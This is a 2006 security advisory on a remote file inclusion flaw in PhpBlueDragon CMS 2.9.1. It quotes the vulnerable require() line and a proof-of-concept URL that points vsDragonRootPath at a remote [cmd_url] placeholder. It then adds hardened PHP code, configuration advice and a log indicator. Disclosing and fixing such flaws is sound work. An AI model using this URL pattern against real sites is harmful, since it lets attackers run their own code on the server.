Computer Security
[EN] securityvulns.ru

From:Federico Fazzi <federico_(at)_autistici.org>
Date:15.06.2006
Subject:PhpBlueDragon CMS 2.9.1, File inclusion vulnerability

-----------------------------------------------------
Advisory id: FSA:015

Author:    Federico Fazzi
Date:      14/06/2006, 18:20
Synthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type:      high
Product:   http://phpbluedragon.net/
Patch:     unavailable
-----------------------------------------------------


1) Description:

The error occurs in template.php, line 23, where $vsDragonRootPath is taken from the request without validation and concatenated into require():

---
require($vsDragonRootPath.
"public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:

http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(note: the value must end with a trailing slash (/))

3) Solution:

Sanitize $vsDragonRootPath before it is used in require(); it must not be taken from request data.
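The following is an added example, not PhpBlueDragon's own code, showing the vulnerable pattern from section 1 next to one way of implementing the fix from section 3: the root path is fixed at install time instead of being read from the request, and the resolved include target is checked to stay below that root. The constant name PBD_ROOT, the helper pbd_safe_require() and the relative location of the application root are assumptions.

```php
<?php
// Added example (not PhpBlueDragon's code). Shows the advisory's vulnerable
// pattern beside a hardened replacement. Names and paths are assumed.

// --- Vulnerable pattern (as described in the advisory) ---
// With register_globals, or any direct assignment from $_GET/$_REQUEST, the
// request controls the prefix that is concatenated into require(). Never do
// this:
//
//   require($vsDragonRootPath . "public_includes/pub_kernel/pbd_template_custom.php");

// --- Hardened form ---
// 1. Fix the application root from the script's own location; the request
//    cannot influence it. The "../../.." is an assumption about where
//    template.php sits relative to the root.
define('PBD_ROOT', realpath(__DIR__ . '/../../..') . DIRECTORY_SEPARATOR);

// 2. Resolve the final path and verify it is still inside PBD_ROOT before
//    handing it to require().
function pbd_safe_require(string $relative): void
{
    // Only plain relative .php paths, no traversal, no scheme such as http://.
    if (strpos($relative, '..') !== false
        || !preg_match('#^[A-Za-z0-9_][A-Za-z0-9_/.-]*\.php$#', $relative)) {
        throw new RuntimeException('Refusing to include non-local path');
    }

    // realpath() returns false for missing files and follows symlinks, so the
    // absolute result is what must be compared against the trusted root.
    $target = realpath(PBD_ROOT . $relative);
    if ($target === false
        || strncmp($target, PBD_ROOT, strlen(PBD_ROOT)) !== 0) {
        throw new RuntimeException('Refusing to include path outside application root');
    }

    require $target;
}

pbd_safe_require('public_includes/pub_kernel/pbd_template_custom.php');
```

The check matters even with register_globals turned off, because any later code that copies a request parameter into $vsDragonRootPath reintroduces the bug; binding the root to __DIR__ removes that possibility. As defence in depth, keep allow_url_include (and, on the PHP versions current for this advisory, allow_url_fopen) disabled so that a remote URL can never be opened by require() at all, and look for request logs containing vsDragonRootPath= with a URL scheme as an indicator that this issue is being probed.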

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod